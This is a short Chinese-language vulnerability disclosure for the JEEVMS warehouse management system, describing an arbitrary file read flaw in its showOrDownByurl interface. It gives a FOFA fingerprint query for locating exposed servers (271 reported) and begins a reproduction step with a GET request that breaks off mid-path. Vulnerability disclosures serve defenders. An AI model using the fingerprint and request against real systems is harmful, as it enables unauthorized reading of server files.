产品简介
本WMS基于JAVA的仓库管理系统(支持3PL(三方物流)和厂内物流),包含PDA端和WEB端,功能涵盖WMS,OMS,BMS(计费管理系统),TMS,成功应用于多家国内知名大客户,客户群体:冷链,干仓,快消品,汽车主机厂和配件厂等行业
漏洞描述
JEEVMS仓库管理系统其showOrDownByurl接口存在任意文件读取漏洞
fofa及漏洞编号
fofa语句:
body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"
影响资产数量:271
漏洞编号:未知
影响版本
JEEVMS仓库管理系统
漏洞复现
get请求访问
GET /systemController/showOrDownByu